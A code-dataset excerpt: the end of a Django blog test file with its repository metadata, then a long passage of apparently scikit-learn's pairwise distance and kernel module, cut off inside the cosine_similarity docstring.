self.assertEqual(child_category.parent, parent_category)
self.assertEqual(child_category.slug, "swoon-reads")
self.assertEqual(parent_category.slug, "writing-wisdom")
comments = XtdComment.objects.all()
self.assertEqual(comments.count(), 2)
parent_comment = XtdComment.objects.get(level=0)
child_comment = XtdComment.objects.get(level=1)
self.assertEqual(parent_comment.id, child_comment.parent_id)
|
{
"content_hash": "4f76f4c9307c35f0418d6d065455ca66",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 78,
"avg_line_length": 45.98571428571429,
"alnum_prop": 0.6595215905560733,
"repo_name": "geminibleep/myblog",
"id": "4ca291631aad1beb6ebe68caf7edfcfdfa29bce7",
"size": "3219",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4626"
},
{
"name": "Python",
"bytes": "43117"
}
],
"symlink_target": ""
}
|
import itertools
from functools import partial
import warnings
import numpy as np
from scipy.spatial import distance
from scipy.sparse import csr_matrix
from scipy.sparse import issparse
from joblib import Parallel, effective_n_jobs
from ..utils.validation import _num_samples
from ..utils.validation import check_non_negative
from ..utils import check_array
from ..utils import gen_even_slices
from ..utils import gen_batches, get_chunk_n_rows
from ..utils import is_scalar_nan
from ..utils.extmath import row_norms, safe_sparse_dot
from ..preprocessing import normalize
from ..utils._mask import _get_mask
from ..utils.fixes import delayed
from ..utils.fixes import sp_version, parse_version
from ._pairwise_fast import _chi2_kernel_fast, _sparse_manhattan
from ..exceptions import DataConversionWarning
# Utility Functions
def _return_float_dtype(X, Y):
"""
1. If dtype of X and Y is float32, then dtype float32 is returned.
2. Else dtype float is returned.
"""
if not issparse(X) and not isinstance(X, np.ndarray):
X = np.asarray(X)
if Y is None:
Y_dtype = X.dtype
elif not issparse(Y) and not isinstance(Y, np.ndarray):
Y = np.asarray(Y)
Y_dtype = Y.dtype
else:
Y_dtype = Y.dtype
if X.dtype == Y_dtype == np.float32:
dtype = np.float32
else:
dtype = float
return X, Y, dtype
def check_pairwise_arrays(
X,
Y,
*,
precomputed=False,
dtype=None,
accept_sparse="csr",
force_all_finite=True,
copy=False,
):
"""Set X and Y appropriately and checks inputs.
If Y is None, it is set as a pointer to X (i.e. not a copy).
If Y is given, this does not happen.
All distance metrics should use this function first to assert that the
given parameters are correct and safe to use.
Specifically, this function first ensures that both X and Y are arrays,
then checks that they are at least two dimensional while ensuring that
their elements are floats (or dtype if provided). Finally, the function
checks that the size of the second dimension of the two arrays is equal, or
the equivalent check for a precomputed distance matrix.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
precomputed : bool, default=False
True if X is to be treated as precomputed distances to the samples in
Y.
dtype : str, type, list of type, default=None
Data type required for X and Y. If None, the dtype will be an
appropriate float type selected by _return_float_dtype.
.. versionadded:: 0.18
accept_sparse : str, bool or list/tuple of str, default='csr'
String[s] representing allowed sparse matrix formats, such as 'csc',
'csr', etc. If the input is sparse but not in the allowed format,
it will be converted to the first listed format. True allows the input
to be any format. False means that a sparse matrix input will
raise an error.
force_all_finite : bool or 'allow-nan', default=True
Whether to raise an error on np.inf, np.nan, pd.NA in array. The
possibilities are:
- True: Force all values of array to be finite.
- False: accepts np.inf, np.nan, pd.NA in array.
- 'allow-nan': accepts only np.nan and pd.NA values in array. Values
cannot be infinite.
.. versionadded:: 0.22
``force_all_finite`` accepts the string ``'allow-nan'``.
.. versionchanged:: 0.23
Accepts `pd.NA` and converts it into `np.nan`.
copy : bool, default=False
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
.. versionadded:: 0.22
Returns
-------
safe_X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
An array equal to X, guaranteed to be a numpy array.
safe_Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
An array equal to Y if Y was not None, guaranteed to be a numpy array.
If Y was None, safe_Y will be a pointer to X.
"""
X, Y, dtype_float = _return_float_dtype(X, Y)
estimator = "check_pairwise_arrays"
if dtype is None:
dtype = dtype_float
if Y is X or Y is None:
X = Y = check_array(
X,
accept_sparse=accept_sparse,
dtype=dtype,
copy=copy,
force_all_finite=force_all_finite,
estimator=estimator,
)
else:
X = check_array(
X,
accept_sparse=accept_sparse,
dtype=dtype,
copy=copy,
force_all_finite=force_all_finite,
estimator=estimator,
)
Y = check_array(
Y,
accept_sparse=accept_sparse,
dtype=dtype,
copy=copy,
force_all_finite=force_all_finite,
estimator=estimator,
)
if precomputed:
if X.shape[1] != Y.shape[0]:
raise ValueError(
"Precomputed metric requires shape "
"(n_queries, n_indexed). Got (%d, %d) "
"for %d indexed." % (X.shape[0], X.shape[1], Y.shape[0])
)
elif X.shape[1] != Y.shape[1]:
raise ValueError(
"Incompatible dimension for X and Y matrices: "
"X.shape[1] == %d while Y.shape[1] == %d" % (X.shape[1], Y.shape[1])
)
return X, Y
def check_paired_arrays(X, Y):
"""Set X and Y appropriately and checks inputs for paired distances.
All paired distance metrics should use this function first to assert that
the given parameters are correct and safe to use.
Specifically, this function first ensures that both X and Y are arrays,
then checks that they are at least two dimensional while ensuring that
their elements are floats. Finally, the function checks that the size
of the dimensions of the two arrays are equal.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
Returns
-------
safe_X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
An array equal to X, guaranteed to be a numpy array.
safe_Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
An array equal to Y if Y was not None, guaranteed to be a numpy array.
If Y was None, safe_Y will be a pointer to X.
"""
X, Y = check_pairwise_arrays(X, Y)
if X.shape != Y.shape:
raise ValueError(
"X and Y should be of same shape. They were respectively %r and %r long."
% (X.shape, Y.shape)
)
return X, Y
# Pairwise distances
def euclidean_distances(
X, Y=None, *, Y_norm_squared=None, squared=False, X_norm_squared=None
):
"""
Considering the rows of X (and Y=X) as vectors, compute the
distance matrix between each pair of vectors.
For efficiency reasons, the euclidean distance between a pair of row
vector x and y is computed as::
dist(x, y) = sqrt(dot(x, x) - 2 * dot(x, y) + dot(y, y))
This formulation has two advantages over other ways of computing distances.
First, it is computationally efficient when dealing with sparse data.
Second, if one argument varies but the other remains unchanged, then
`dot(x, x)` and/or `dot(y, y)` can be pre-computed.
However, this is not the most precise way of doing this computation,
because this equation potentially suffers from "catastrophic cancellation".
Also, the distance matrix returned by this function may not be exactly
symmetric as required by, e.g., ``scipy.spatial.distance`` functions.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features), \
default=None
If `None`, uses `Y=X`.
Y_norm_squared : array-like of shape (n_samples_Y,) or (n_samples_Y, 1) \
or (1, n_samples_Y), default=None
Pre-computed dot-products of vectors in Y (e.g.,
``(Y**2).sum(axis=1)``)
May be ignored in some cases, see the note below.
squared : bool, default=False
Return squared Euclidean distances.
X_norm_squared : array-like of shape (n_samples_X,) or (n_samples_X, 1) \
or (1, n_samples_X), default=None
Pre-computed dot-products of vectors in X (e.g.,
``(X**2).sum(axis=1)``)
May be ignored in some cases, see the note below.
Notes
-----
To achieve better accuracy, `X_norm_squared` and `Y_norm_squared` may be
unused if they are passed as ``float32``.
Returns
-------
distances : ndarray of shape (n_samples_X, n_samples_Y)
See Also
--------
paired_distances : Distances betweens pairs of elements of X and Y.
Examples
--------
>>> from sklearn.metrics.pairwise import euclidean_distances
>>> X = [[0, 1], [1, 1]]
>>> # distance between rows of X
>>> euclidean_distances(X, X)
array([[0., 1.],
[1., 0.]])
>>> # get distance to origin
>>> euclidean_distances(X, [[0, 0]])
array([[1. ],
[1.41421356]])
"""
X, Y = check_pairwise_arrays(X, Y)
if X_norm_squared is not None:
X_norm_squared = check_array(X_norm_squared, ensure_2d=False)
original_shape = X_norm_squared.shape
if X_norm_squared.shape == (X.shape[0],):
X_norm_squared = X_norm_squared.reshape(-1, 1)
if X_norm_squared.shape == (1, X.shape[0]):
X_norm_squared = X_norm_squared.T
if X_norm_squared.shape != (X.shape[0], 1):
raise ValueError(
f"Incompatible dimensions for X of shape {X.shape} and "
f"X_norm_squared of shape {original_shape}."
)
if Y_norm_squared is not None:
Y_norm_squared = check_array(Y_norm_squared, ensure_2d=False)
original_shape = Y_norm_squared.shape
if Y_norm_squared.shape == (Y.shape[0],):
Y_norm_squared = Y_norm_squared.reshape(1, -1)
if Y_norm_squared.shape == (Y.shape[0], 1):
Y_norm_squared = Y_norm_squared.T
if Y_norm_squared.shape != (1, Y.shape[0]):
raise ValueError(
f"Incompatible dimensions for Y of shape {Y.shape} and "
f"Y_norm_squared of shape {original_shape}."
)
return _euclidean_distances(X, Y, X_norm_squared, Y_norm_squared, squared)
def _euclidean_distances(X, Y, X_norm_squared=None, Y_norm_squared=None, squared=False):
"""Computational part of euclidean_distances
Assumes inputs are already checked.
If norms are passed as float32, they are unused. If arrays are passed as
float32, norms needs to be recomputed on upcast chunks.
TODO: use a float64 accumulator in row_norms to avoid the latter.
"""
if X_norm_squared is not None:
if X_norm_squared.dtype == np.float32:
XX = None
else:
XX = X_norm_squared.reshape(-1, 1)
elif X.dtype == np.float32:
XX = None
else:
XX = row_norms(X, squared=True)[:, np.newaxis]
if Y is X:
YY = None if XX is None else XX.T
else:
if Y_norm_squared is not None:
if Y_norm_squared.dtype == np.float32:
YY = None
else:
YY = Y_norm_squared.reshape(1, -1)
elif Y.dtype == np.float32:
YY = None
else:
YY = row_norms(Y, squared=True)[np.newaxis, :]
if X.dtype == np.float32:
# To minimize precision issues with float32, we compute the distance
# matrix on chunks of X and Y upcast to float64
distances = _euclidean_distances_upcast(X, XX, Y, YY)
else:
# if dtype is already float64, no need to chunk and upcast
distances = -2 * safe_sparse_dot(X, Y.T, dense_output=True)
distances += XX
distances += YY
np.maximum(distances, 0, out=distances)
# Ensure that distances between vectors and themselves are set to 0.0.
# This may not be the case due to floating point rounding errors.
if X is Y:
np.fill_diagonal(distances, 0)
return distances if squared else np.sqrt(distances, out=distances)
def nan_euclidean_distances(
X, Y=None, *, squared=False, missing_values=np.nan, copy=True
):
"""Calculate the euclidean distances in the presence of missing values.
Compute the euclidean distance between each pair of samples in X and Y,
where Y=X is assumed if Y=None. When calculating the distance between a
pair of samples, this formulation ignores feature coordinates with a
missing value in either sample and scales up the weight of the remaining
coordinates:
dist(x,y) = sqrt(weight * sq. distance from present coordinates)
where,
weight = Total # of coordinates / # of present coordinates
For example, the distance between ``[3, na, na, 6]`` and ``[1, na, 4, 5]``
is:
.. math::
\\sqrt{\\frac{4}{2}((3-1)^2 + (6-5)^2)}
If all the coordinates are missing or if there are no common present
coordinates then NaN is returned for that pair.
Read more in the :ref:`User Guide <metrics>`.
.. versionadded:: 0.22
Parameters
----------
X : array-like of shape=(n_samples_X, n_features)
Y : array-like of shape=(n_samples_Y, n_features), default=None
squared : bool, default=False
Return squared Euclidean distances.
missing_values : np.nan or int, default=np.nan
Representation of missing value.
copy : bool, default=True
Make and use a deep copy of X and Y (if Y exists).
Returns
-------
distances : ndarray of shape (n_samples_X, n_samples_Y)
See Also
--------
paired_distances : Distances between pairs of elements of X and Y.
Examples
--------
>>> from sklearn.metrics.pairwise import nan_euclidean_distances
>>> nan = float("NaN")
>>> X = [[0, 1], [1, nan]]
>>> nan_euclidean_distances(X, X) # distance between rows of X
array([[0. , 1.41421356],
[1.41421356, 0. ]])
>>> # get distance to origin
>>> nan_euclidean_distances(X, [[0, 0]])
array([[1. ],
[1.41421356]])
References
----------
* John K. Dixon, "Pattern Recognition with Partly Missing Data",
IEEE Transactions on Systems, Man, and Cybernetics, Volume: 9, Issue:
10, pp. 617 - 621, Oct. 1979.
http://ieeexplore.ieee.org/abstract/document/4310090/
"""
force_all_finite = "allow-nan" if is_scalar_nan(missing_values) else True
X, Y = check_pairwise_arrays(
X, Y, accept_sparse=False, force_all_finite=force_all_finite, copy=copy
)
# Get missing mask for X
missing_X = _get_mask(X, missing_values)
# Get missing mask for Y
missing_Y = missing_X if Y is X else _get_mask(Y, missing_values)
# set missing values to zero
X[missing_X] = 0
Y[missing_Y] = 0
distances = euclidean_distances(X, Y, squared=True)
# Adjust distances for missing values
XX = X * X
YY = Y * Y
distances -= np.dot(XX, missing_Y.T)
distances -= np.dot(missing_X, YY.T)
np.clip(distances, 0, None, out=distances)
if X is Y:
# Ensure that distances between vectors and themselves are set to 0.0.
# This may not be the case due to floating point rounding errors.
np.fill_diagonal(distances, 0.0)
present_X = 1 - missing_X
present_Y = present_X if Y is X else ~missing_Y
present_count = np.dot(present_X, present_Y.T)
distances[present_count == 0] = np.nan
# avoid divide by zero
np.maximum(1, present_count, out=present_count)
distances /= present_count
distances *= X.shape[1]
if not squared:
np.sqrt(distances, out=distances)
return distances
def _euclidean_distances_upcast(X, XX=None, Y=None, YY=None, batch_size=None):
"""Euclidean distances between X and Y.
Assumes X and Y have float32 dtype.
Assumes XX and YY have float64 dtype or are None.
X and Y are upcast to float64 by chunks, which size is chosen to limit
memory increase by approximately 10% (at least 10MiB).
"""
n_samples_X = X.shape[0]
n_samples_Y = Y.shape[0]
n_features = X.shape[1]
distances = np.empty((n_samples_X, n_samples_Y), dtype=np.float32)
if batch_size is None:
x_density = X.nnz / np.prod(X.shape) if issparse(X) else 1
y_density = Y.nnz / np.prod(Y.shape) if issparse(Y) else 1
# Allow 10% more memory than X, Y and the distance matrix take (at
# least 10MiB)
maxmem = max(
(
(x_density * n_samples_X + y_density * n_samples_Y) * n_features
+ (x_density * n_samples_X * y_density * n_samples_Y)
)
/ 10,
10 * 2 ** 17,
)
# The increase amount of memory in 8-byte blocks is:
# - x_density * batch_size * n_features (copy of chunk of X)
# - y_density * batch_size * n_features (copy of chunk of Y)
# - batch_size * batch_size (chunk of distance matrix)
# Hence x² + (xd+yd)kx = M, where x=batch_size, k=n_features, M=maxmem
# xd=x_density and yd=y_density
tmp = (x_density + y_density) * n_features
batch_size = (-tmp + np.sqrt(tmp ** 2 + 4 * maxmem)) / 2
batch_size = max(int(batch_size), 1)
x_batches = gen_batches(n_samples_X, batch_size)
for i, x_slice in enumerate(x_batches):
X_chunk = X[x_slice].astype(np.float64)
if XX is None:
XX_chunk = row_norms(X_chunk, squared=True)[:, np.newaxis]
else:
XX_chunk = XX[x_slice]
y_batches = gen_batches(n_samples_Y, batch_size)
for j, y_slice in enumerate(y_batches):
if X is Y and j < i:
# when X is Y the distance matrix is symmetric so we only need
# to compute half of it.
d = distances[y_slice, x_slice].T
else:
Y_chunk = Y[y_slice].astype(np.float64)
if YY is None:
YY_chunk = row_norms(Y_chunk, squared=True)[np.newaxis, :]
else:
YY_chunk = YY[:, y_slice]
d = -2 * safe_sparse_dot(X_chunk, Y_chunk.T, dense_output=True)
d += XX_chunk
d += YY_chunk
distances[x_slice, y_slice] = d.astype(np.float32, copy=False)
return distances
def _argmin_min_reduce(dist, start):
indices = dist.argmin(axis=1)
values = dist[np.arange(dist.shape[0]), indices]
return indices, values
def pairwise_distances_argmin_min(
X, Y, *, axis=1, metric="euclidean", metric_kwargs=None
):
"""Compute minimum distances between one point and a set of points.
This function computes for each row in X, the index of the row of Y which
is closest (according to the specified distance). The minimal distances are
also returned.
This is mostly equivalent to calling:
(pairwise_distances(X, Y=Y, metric=metric).argmin(axis=axis),
pairwise_distances(X, Y=Y, metric=metric).min(axis=axis))
but uses much less memory, and is faster for large arrays.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
Array containing points.
Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
Array containing points.
axis : int, default=1
Axis along which the argmin and distances are to be computed.
metric : str or callable, default='euclidean'
Metric to use for distance computation. Any metric from scikit-learn
or scipy.spatial.distance can be used.
If metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays as input and return one value indicating the
distance between them. This works for Scipy's metrics, but is less
efficient than passing the metric name as a string.
Distance matrices are not supported.
Valid values for metric are:
- from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
'manhattan']
- from scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'minkowski', 'rogerstanimoto', 'russellrao',
'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean',
'yule']
See the documentation for scipy.spatial.distance for details on these
metrics.
metric_kwargs : dict, default=None
Keyword arguments to pass to specified metric function.
Returns
-------
argmin : ndarray
Y[argmin[i], :] is the row in Y that is closest to X[i, :].
distances : ndarray
distances[i] is the distance between the i-th row in X and the
argmin[i]-th row in Y.
See Also
--------
sklearn.metrics.pairwise_distances
sklearn.metrics.pairwise_distances_argmin
"""
X, Y = check_pairwise_arrays(X, Y)
if metric_kwargs is None:
metric_kwargs = {}
if axis == 0:
X, Y = Y, X
indices, values = zip(
*pairwise_distances_chunked(
X, Y, reduce_func=_argmin_min_reduce, metric=metric, **metric_kwargs
)
)
indices = np.concatenate(indices)
values = np.concatenate(values)
return indices, values
def pairwise_distances_argmin(X, Y, *, axis=1, metric="euclidean", metric_kwargs=None):
"""Compute minimum distances between one point and a set of points.
This function computes for each row in X, the index of the row of Y which
is closest (according to the specified distance).
This is mostly equivalent to calling:
pairwise_distances(X, Y=Y, metric=metric).argmin(axis=axis)
but uses much less memory, and is faster for large arrays.
This function works with dense 2D arrays only.
Parameters
----------
X : array-like of shape (n_samples_X, n_features)
Array containing points.
Y : array-like of shape (n_samples_Y, n_features)
Arrays containing points.
axis : int, default=1
Axis along which the argmin and distances are to be computed.
metric : str or callable, default="euclidean"
Metric to use for distance computation. Any metric from scikit-learn
or scipy.spatial.distance can be used.
If metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays as input and return one value indicating the
distance between them. This works for Scipy's metrics, but is less
efficient than passing the metric name as a string.
Distance matrices are not supported.
Valid values for metric are:
- from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
'manhattan']
- from scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'minkowski', 'rogerstanimoto', 'russellrao',
'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean',
'yule']
See the documentation for scipy.spatial.distance for details on these
metrics.
metric_kwargs : dict, default=None
Keyword arguments to pass to specified metric function.
Returns
-------
argmin : numpy.ndarray
Y[argmin[i], :] is the row in Y that is closest to X[i, :].
See Also
--------
sklearn.metrics.pairwise_distances
sklearn.metrics.pairwise_distances_argmin_min
"""
if metric_kwargs is None:
metric_kwargs = {}
return pairwise_distances_argmin_min(
X, Y, axis=axis, metric=metric, metric_kwargs=metric_kwargs
)[0]
def haversine_distances(X, Y=None):
"""Compute the Haversine distance between samples in X and Y.
The Haversine (or great circle) distance is the angular distance between
two points on the surface of a sphere. The first coordinate of each point
is assumed to be the latitude, the second is the longitude, given
in radians. The dimension of the data must be 2.
.. math::
D(x, y) = 2\\arcsin[\\sqrt{\\sin^2((x1 - y1) / 2)
+ \\cos(x1)\\cos(y1)\\sin^2((x2 - y2) / 2)}]
Parameters
----------
X : array-like of shape (n_samples_X, 2)
Y : array-like of shape (n_samples_Y, 2), default=None
Returns
-------
distance : ndarray of shape (n_samples_X, n_samples_Y)
Notes
-----
As the Earth is nearly spherical, the haversine formula provides a good
approximation of the distance between two points of the Earth surface, with
a less than 1% error on average.
Examples
--------
We want to calculate the distance between the Ezeiza Airport
(Buenos Aires, Argentina) and the Charles de Gaulle Airport (Paris,
France).
>>> from sklearn.metrics.pairwise import haversine_distances
>>> from math import radians
>>> bsas = [-34.83333, -58.5166646]
>>> paris = [49.0083899664, 2.53844117956]
>>> bsas_in_radians = [radians(_) for _ in bsas]
>>> paris_in_radians = [radians(_) for _ in paris]
>>> result = haversine_distances([bsas_in_radians, paris_in_radians])
>>> result * 6371000/1000 # multiply by Earth radius to get kilometers
array([[ 0. , 11099.54035582],
[11099.54035582, 0. ]])
"""
from ..neighbors import DistanceMetric
return DistanceMetric.get_metric("haversine").pairwise(X, Y)
def manhattan_distances(X, Y=None, *, sum_over_features=True):
"""Compute the L1 distances between the vectors in X and Y.
With sum_over_features equal to False it returns the componentwise
distances.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : array-like of shape (n_samples_X, n_features)
Y : array-like of shape (n_samples_Y, n_features), default=None
If `None`, uses `Y=X`.
sum_over_features : bool, default=True
If True the function returns the pairwise distance matrix
else it returns the componentwise L1 pairwise-distances.
Not supported for sparse matrix inputs.
Returns
-------
D : ndarray of shape (n_samples_X * n_samples_Y, n_features) or \
(n_samples_X, n_samples_Y)
If sum_over_features is False shape is
(n_samples_X * n_samples_Y, n_features) and D contains the
componentwise L1 pairwise-distances (ie. absolute difference),
else shape is (n_samples_X, n_samples_Y) and D contains
the pairwise L1 distances.
Notes
--------
When X and/or Y are CSR sparse matrices and they are not already
in canonical format, this function modifies them in-place to
make them canonical.
Examples
--------
>>> from sklearn.metrics.pairwise import manhattan_distances
>>> manhattan_distances([[3]], [[3]])
array([[0.]])
>>> manhattan_distances([[3]], [[2]])
array([[1.]])
>>> manhattan_distances([[2]], [[3]])
array([[1.]])
>>> manhattan_distances([[1, 2], [3, 4]],\
[[1, 2], [0, 3]])
array([[0., 2.],
[4., 4.]])
>>> import numpy as np
>>> X = np.ones((1, 2))
>>> y = np.full((2, 2), 2.)
>>> manhattan_distances(X, y, sum_over_features=False)
array([[1., 1.],
[1., 1.]])
"""
X, Y = check_pairwise_arrays(X, Y)
if issparse(X) or issparse(Y):
if not sum_over_features:
raise TypeError(
"sum_over_features=%r not supported for sparse matrices"
% sum_over_features
)
X = csr_matrix(X, copy=False)
Y = csr_matrix(Y, copy=False)
X.sum_duplicates() # this also sorts indices in-place
Y.sum_duplicates()
D = np.zeros((X.shape[0], Y.shape[0]))
_sparse_manhattan(X.data, X.indices, X.indptr, Y.data, Y.indices, Y.indptr, D)
return D
if sum_over_features:
return distance.cdist(X, Y, "cityblock")
D = X[:, np.newaxis, :] - Y[np.newaxis, :, :]
D = np.abs(D, D)
return D.reshape((-1, X.shape[1]))
def cosine_distances(X, Y=None):
"""Compute cosine distance between samples in X and Y.
Cosine distance is defined as 1.0 minus the cosine similarity.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
Matrix `X`.
Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features), \
default=None
Matrix `Y`.
Returns
-------
distance matrix : ndarray of shape (n_samples_X, n_samples_Y)
See Also
--------
cosine_similarity
scipy.spatial.distance.cosine : Dense matrices only.
"""
# 1.0 - cosine_similarity(X, Y) without copy
S = cosine_similarity(X, Y)
S *= -1
S += 1
np.clip(S, 0, 2, out=S)
if X is Y or Y is None:
# Ensure that distances between vectors and themselves are set to 0.0.
# This may not be the case due to floating point rounding errors.
S[np.diag_indices_from(S)] = 0.0
return S
# Paired distances
def paired_euclidean_distances(X, Y):
"""
Computes the paired euclidean distances between X and Y.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Y : array-like of shape (n_samples, n_features)
Returns
-------
distances : ndarray of shape (n_samples,)
"""
X, Y = check_paired_arrays(X, Y)
return row_norms(X - Y)
def paired_manhattan_distances(X, Y):
"""Compute the L1 distances between the vectors in X and Y.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Y : array-like of shape (n_samples, n_features)
Returns
-------
distances : ndarray of shape (n_samples,)
"""
X, Y = check_paired_arrays(X, Y)
diff = X - Y
if issparse(diff):
diff.data = np.abs(diff.data)
return np.squeeze(np.array(diff.sum(axis=1)))
else:
return np.abs(diff).sum(axis=-1)
def paired_cosine_distances(X, Y):
"""
Computes the paired cosine distances between X and Y.
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Y : array-like of shape (n_samples, n_features)
Returns
-------
distances : ndarray of shape (n_samples,)
Notes
-----
The cosine distance is equivalent to the half the squared
euclidean distance if each sample is normalized to unit norm.
"""
X, Y = check_paired_arrays(X, Y)
return 0.5 * row_norms(normalize(X) - normalize(Y), squared=True)
PAIRED_DISTANCES = {
"cosine": paired_cosine_distances,
"euclidean": paired_euclidean_distances,
"l2": paired_euclidean_distances,
"l1": paired_manhattan_distances,
"manhattan": paired_manhattan_distances,
"cityblock": paired_manhattan_distances,
}
def paired_distances(X, Y, *, metric="euclidean", **kwds):
"""
Computes the paired distances between X and Y.
Computes the distances between (X[0], Y[0]), (X[1], Y[1]), etc...
Read more in the :ref:`User Guide <metrics>`.
Parameters
----------
X : ndarray of shape (n_samples, n_features)
Array 1 for distance computation.
Y : ndarray of shape (n_samples, n_features)
Array 2 for distance computation.
metric : str or callable, default="euclidean"
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
specified in PAIRED_DISTANCES, including "euclidean",
"manhattan", or "cosine".
Alternatively, if metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays from X as input and return a value indicating
the distance between them.
Returns
-------
distances : ndarray of shape (n_samples,)
See Also
--------
pairwise_distances : Computes the distance between every pair of samples.
Examples
--------
>>> from sklearn.metrics.pairwise import paired_distances
>>> X = [[0, 1], [1, 1]]
>>> Y = [[0, 1], [2, 1]]
>>> paired_distances(X, Y)
array([0., 1.])
"""
if metric in PAIRED_DISTANCES:
func = PAIRED_DISTANCES[metric]
return func(X, Y)
elif callable(metric):
# Check the matrix first (it is usually done by the metric)
X, Y = check_paired_arrays(X, Y)
distances = np.zeros(len(X))
for i in range(len(X)):
distances[i] = metric(X[i], Y[i])
return distances
else:
raise ValueError("Unknown distance %s" % metric)
# Kernels
def linear_kernel(X, Y=None, dense_output=True):
"""
Compute the linear kernel between X and Y.
Read more in the :ref:`User Guide <linear_kernel>`.
Parameters
----------
X : ndarray of shape (n_samples_X, n_features)
Y : ndarray of shape (n_samples_Y, n_features), default=None
If `None`, uses `Y=X`.
dense_output : bool, default=True
Whether to return dense output even when the input is sparse. If
``False``, the output is sparse if both input arrays are sparse.
.. versionadded:: 0.20
Returns
-------
Gram matrix : ndarray of shape (n_samples_X, n_samples_Y)
"""
X, Y = check_pairwise_arrays(X, Y)
return safe_sparse_dot(X, Y.T, dense_output=dense_output)
def polynomial_kernel(X, Y=None, degree=3, gamma=None, coef0=1):
"""
Compute the polynomial kernel between X and Y::
K(X, Y) = (gamma <X, Y> + coef0)^degree
Read more in the :ref:`User Guide <polynomial_kernel>`.
Parameters
----------
X : ndarray of shape (n_samples_X, n_features)
Y : ndarray of shape (n_samples_Y, n_features), default=None
degree : int, default=3
gamma : float, default=None
If None, defaults to 1.0 / n_features.
coef0 : float, default=1
Returns
-------
Gram matrix : ndarray of shape (n_samples_X, n_samples_Y)
"""
X, Y = check_pairwise_arrays(X, Y)
if gamma is None:
gamma = 1.0 / X.shape[1]
K = safe_sparse_dot(X, Y.T, dense_output=True)
K *= gamma
K += coef0
K **= degree
return K
def sigmoid_kernel(X, Y=None, gamma=None, coef0=1):
"""
Compute the sigmoid kernel between X and Y::
K(X, Y) = tanh(gamma <X, Y> + coef0)
Read more in the :ref:`User Guide <sigmoid_kernel>`.
Parameters
----------
X : ndarray of shape (n_samples_X, n_features)
Y : ndarray of shape (n_samples_Y, n_features), default=None
If `None`, uses `Y=X`.
gamma : float, default=None
If None, defaults to 1.0 / n_features.
coef0 : float, default=1
Returns
-------
Gram matrix : ndarray of shape (n_samples_X, n_samples_Y)
"""
X, Y = check_pairwise_arrays(X, Y)
if gamma is None:
gamma = 1.0 / X.shape[1]
K = safe_sparse_dot(X, Y.T, dense_output=True)
K *= gamma
K += coef0
np.tanh(K, K) # compute tanh in-place
return K
def rbf_kernel(X, Y=None, gamma=None):
"""
Compute the rbf (gaussian) kernel between X and Y::
K(x, y) = exp(-gamma ||x-y||^2)
for each pair of rows x in X and y in Y.
Read more in the :ref:`User Guide <rbf_kernel>`.
Parameters
----------
X : ndarray of shape (n_samples_X, n_features)
Y : ndarray of shape (n_samples_Y, n_features), default=None
If `None`, uses `Y=X`.
gamma : float, default=None
If None, defaults to 1.0 / n_features.
Returns
-------
kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)
"""
X, Y = check_pairwise_arrays(X, Y)
if gamma is None:
gamma = 1.0 / X.shape[1]
K = euclidean_distances(X, Y, squared=True)
K *= -gamma
np.exp(K, K) # exponentiate K in-place
return K
def laplacian_kernel(X, Y=None, gamma=None):
"""Compute the laplacian kernel between X and Y.
The laplacian kernel is defined as::
K(x, y) = exp(-gamma ||x-y||_1)
for each pair of rows x in X and y in Y.
Read more in the :ref:`User Guide <laplacian_kernel>`.
.. versionadded:: 0.17
Parameters
----------
X : ndarray of shape (n_samples_X, n_features)
Y : ndarray of shape (n_samples_Y, n_features), default=None
If `None`, uses `Y=X`.
gamma : float, default=None
If None, defaults to 1.0 / n_features.
Returns
-------
kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)
"""
X, Y = check_pairwise_arrays(X, Y)
if gamma is None:
gamma = 1.0 / X.shape[1]
K = -gamma * manhattan_distances(X, Y)
np.exp(K, K) # exponentiate K in-place
return K
def cosine_similarity(X, Y=None, dense_output=True):
"""Compute cosine similarity between samples in X and Y.
Cosine similarity, or the cosine kernel, computes similarity as the
normalized dot product of X and Y:
K(X, Y) = <X, Y> / (||X||*||Y||)
On L2-normalized data, this function is equivalent to linear_kernel.
